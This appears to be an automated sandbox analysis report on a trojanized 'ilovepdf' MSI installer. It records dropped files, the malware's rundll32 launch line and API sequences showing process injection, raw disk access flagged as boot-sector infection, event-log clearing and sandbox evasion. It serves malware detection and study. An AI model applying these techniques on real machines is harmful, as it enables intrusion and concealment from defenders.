Source: C:\Windows\System32\svchost.exeCode function: String function: 0000012E19833D40 appears 38 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 0000024B7D11B848 appears 39 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 0000012E19834D50 appears 129 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00000204F33CB6A8 appears 39 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00000204F33CB6B8 appears 32 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 0000012E19834000 appears 149 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 0000012E178BB848 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: String function: 0060C688 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: String function: 00615D14 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: String function: 005DD7A8 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: String function: 005F4B90 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: String function: 005F4E74 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: String function: 00615A90 appears 37 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC6740: GetModuleHandleA,GetProcAddress,CreateFileA,DeviceIoControl,CloseHandle,13_2_04EC6740
Source: MSIFBC3.tmp.10.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-JDQA9.tmp.11.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: 6rfyiAq0nM.msiBinary or memory string: OriginalFileName vs 6rfyiAq0nM.msi
Source: is-93C0J.tmp.11.drStatic PE information: Section: UPX1 ZLIB complexity 0.990987760073
Source: is-30MA7.tmp.11.drStatic PE information: Section: UPX1 ZLIB complexity 0.990885780988
Source: is-8KFAQ.tmp.11.drStatic PE information: Section: UPX1 ZLIB complexity 0.991569422468
Source: is-UKPSI.tmp.11.drStatic PE information: Section: UPX1 ZLIB complexity 0.991049810131
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
Source: classification engineClassification label: mal74.troj.spyw.evad.winMSI@10/39@2/5
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile read: C:\Program Files (x86)\desktop.iniJump to behavior
Source: C:\Windows\Installer\MSIFBC3.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\Installer\MSIFBC3.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC3710 OpenSCManagerW,OpenServiceW,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,13_2_04EC3710
Source: 6rfyiAq0nMJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004AF9F0 FindResourceW,SizeofResource,LoadResource,LockResource,10_2_004AF9F0
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdfJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: 6rfyiAq0nM.msiVirustotal: Detection: 31%
Source: 6rfyiAq0nM.msiReversingLabs: Detection: 35%
Source: C:\Windows\Installer\MSIFBC3.tmpKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\msiexec.exe 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\6rfyiAq0nM.msi'
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIFBC3.tmp C:\Windows\Installer\MSIFBC3.tmp
Source: C:\Windows\Installer\MSIFBC3.tmpProcess created: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp 'C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp' /SL5='$9025C,6374824,780800,C:\Windows\Installer\MSIFBC3.tmp'
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rUNdLl32.Exe' 'C:\Program Files (x86)\ilovepdf\sqlite.dll',global
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k SystemNetworkService
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIFBC3.tmp C:\Windows\Installer\MSIFBC3.tmpJump to behavior
Source: C:\Windows\Installer\MSIFBC3.tmpProcess created: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp 'C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp' /SL5='$9025C,6374824,780800,C:\Windows\Installer\MSIFBC3.tmp' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rUNdLl32.Exe' 'C:\Program Files (x86)\ilovepdf\sqlite.dll',globalJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k SystemNetworkServiceJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,10_2_004AF110
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04ECAA70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,13_2_04ECAA70
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0EDA60 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,14_2_0000024B7D0EDA60
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1788DA60 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,16_2_0000012E1788DA60
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339DA60 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,17_2_00000204F339DA60
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DFAE8A96F5E4660E33.TMPJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_0062C764 GetVersion,CoCreateInstance,11_2_0062C764
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0041A4DC GetDiskFreeSpaceW,10_2_0041A4DC
Source: svchost.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: svchost.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: svchost.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: svchost.exe, 00000010.00000002.829801216.0000012E19820000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC5C60 GetModuleFileNameW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,FindCloseChangeNotification,13_2_04EC5C60
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rUNdLl32.Exe' 'C:\Program Files (x86)\ilovepdf\sqlite.dll',global
Source: 6rfyiAq0nM.msiStatic file information: TRID: Microsoft Windows Installer (77509/1) 90.59%
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpWindow found: window name: TMainFormJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpAutomated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpAutomated click: Install
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpAutomated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpAutomated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpAutomated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpAutomated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpAutomated click: Next
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: 6rfyiAq0nM.msiStatic file information: File size 7306752 > 1048576
Source: Binary string: 2"j.pdb source: is-30MA7.tmp.11.dr
Source: Binary string: .pdbYH source: is-UKPSI.tmp.11.dr
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004B5000 push 004B50DEh; ret 10_2_004B50D6
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004B5980 push 004B5A48h; ret 10_2_004B5A40
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00458000 push ecx; mov dword ptr [esp], ecx10_2_00458005
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0049B03C push ecx; mov dword ptr [esp], edx10_2_0049B03D
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004A00F8 push ecx; mov dword ptr [esp], edx10_2_004A00F9
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00458084 push ecx; mov dword ptr [esp], ecx10_2_00458089
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004B1084 push 004B10ECh; ret 10_2_004B10E4
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004A1094 push ecx; mov dword ptr [esp], edx10_2_004A1095
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0041A0B4 push ecx; mov dword ptr [esp], ecx10_2_0041A0B8
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004270BC push 00427104h; ret 10_2_004270FC
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00458108 push ecx; mov dword ptr [esp], ecx10_2_0045810D
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004321C8 push ecx; mov dword ptr [esp], edx10_2_004321C9
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004A21D8 push ecx; mov dword ptr [esp], edx10_2_004A21D9
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0049E1B8 push ecx; mov dword ptr [esp], edx10_2_0049E1B9
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0049A260 push 0049A378h; ret 10_2_0049A370
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00455268 push ecx; mov dword ptr [esp], ecx10_2_0045526C
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004252D4 push ecx; mov dword ptr [esp], eax10_2_004252D9
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004592FC push ecx; mov dword ptr [esp], edx10_2_004592FD
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0045B284 push ecx; mov dword ptr [esp], edx10_2_0045B285
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00430358 push ecx; mov dword ptr [esp], eax10_2_00430359
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00430370 push ecx; mov dword ptr [esp], eax10_2_00430371
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00459394 push ecx; mov dword ptr [esp], ecx10_2_00459398
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004A1428 push ecx; mov dword ptr [esp], edx10_2_004A1429
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0049B424 push ecx; mov dword ptr [esp], edx10_2_0049B425
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004A24D8 push ecx; mov dword ptr [esp], edx10_2_004A24D9
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004224F0 push 004225F4h; ret 10_2_004225EC
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004304F0 push ecx; mov dword ptr [esp], eax10_2_004304F1
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00499490 push ecx; mov dword ptr [esp], edx10_2_00499493
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00458564 push ecx; mov dword ptr [esp], edx10_2_00458565
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00458574 push ecx; mov dword ptr [esp], edx10_2_00458575
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00457574 push ecx; mov dword ptr [esp], ecx10_2_00457578
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC8FD0 CloseServiceHandle,LoadLibraryA,LoadLibraryA,GetProcAddress,RtlAdjustPrivilege,OpenProcess,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,13_2_04EC8FD0
Source: MSIFBC3.tmp.2.drStatic PE information: section name: .didata
Source: MSIFBC3.tmp.10.drStatic PE information: section name: .didata
Source: is-JDQA9.tmp.11.drStatic PE information: section name: .didata
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1

Persistence and Installation Behavior:

barindex
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSIFBC3.tmpJump to behavior
Contains functionality to infect the boot sectorShow sources
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetModuleHandleA,GetProcAddress,CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive013_2_04EC6740
Source: C:\Windows\System32\svchost.exeCode function: GetModuleHandleA,GetProcAddress,GetSystemFirmwareTable,GetSystemFirmwareTable,CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive016_2_0000012E17889FB0
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\is-30MA7.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-ATKLL.tmp\_isetup\_isdecmp.dllJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFBC3.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\ti.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-ATKLL.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\is-93C0J.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\ilovepdf.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\sqlite.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\twlib.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\is-UKPSI.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\is-JDQA9.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\is-VR0CA.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\th.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\tt.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\is-CU1EC.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\unins000.exe (copy)Jump to dropped file
Source: C:\Windows\Installer\MSIFBC3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\Program Files (x86)\ilovepdf\is-8KFAQ.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFBC3.tmpJump to dropped file

Boot Survival:

barindex
Contains functionality to infect the boot sectorShow sources
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetModuleHandleA,GetProcAddress,CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive013_2_04EC6740
Source: C:\Windows\System32\svchost.exeCode function: GetModuleHandleA,GetProcAddress,GetSystemFirmwareTable,GetSystemFirmwareTable,CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive016_2_0000012E17889FB0
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ilovepdf.lnkJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC3710 OpenSCManagerW,OpenServiceW,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,13_2_04EC3710
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_006A52B8 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,SetActiveWindow,11_2_006A52B8
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_005C7E30 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow,11_2_005C7E30
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EBA010 ClearEventLogW,OpenEventLogA,ClearEventLogW,CloseEventLog,13_2_04EBA010
Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5HQ15BTC-BI2Q-S1J7-YRC6-SZJY3C3CP8J7}\650478DC7424C37C 1Jump to behavior
Source: C:\Windows\System32\svchost.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Control Panel\InternationalJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Installer\MSIFBC3.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\Installer\MSIFBC3.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\Installer\MSIFBC3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Installer\MSIFBC3.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Query firmware table information (likely to detect VMs)Show sources
Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
Contains functionality to compare user and computer (likely to detect sandboxes)Show sources
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetCommandLineW,GetModuleFileNameW,lstrcmpiW,StrStrIW,StrStrIW,CreateThread,CreateThread,CloseHandle,CloseHandle,CreateThread,CloseHandle,StrStrIW,CreateThread,WaitForSingleObject,CloseHandle,StrStrIW,Sleep,Sleep,CreateThread,WaitForSingleObject,CloseHandle,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,13_2_04ECC0A0
Source: C:\Windows\System32\svchost.exeCode function: GetCommandLineW,GetModuleFileNameW,lstrcmpiW,StrStrIW,CreateThread,CloseHandle,CreateThread,CloseHandle,StrStrIW,CreateThread,WaitForSingleObject,CloseHandle,StrStrIW,Sleep,CreateThread,WaitForSingleObject,CloseHandle,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,14_2_0000024B7D0EF5E0
Source: C:\Windows\System32\svchost.exeCode function: GetCommandLineW,GetModuleFileNameW,lstrcmpiW,StrStrIW,CreateThread,CloseHandle,CreateThread,CloseHandle,StrStrIW,CreateThread,WaitForSingleObject,CloseHandle,StrStrIW,Sleep,CreateThread,WaitForSingleObject,CloseHandle,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,16_2_0000012E1788F5E0
Source: C:\Windows\System32\svchost.exeCode function: GetCommandLineW,GetModuleFileNameW,lstrcmpiW,StrStrIW,CreateThread,CloseHandle,FindCloseChangeNotification,CreateThread,CloseHandle,StrStrIW,CreateThread,WaitForSingleObject,CloseHandle,StrStrIW,Sleep,CreateThread,WaitForSingleObject,CloseHandle,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,17_2_00000204F339F5E0
Contains functionality to detect sleep reduction / modificationsShow sources
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB3C3013_2_04EB3C30
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D441014_2_0000024B7D0D4410
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1787441016_2_0000012E17874410
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F338441017_2_00000204F3384410
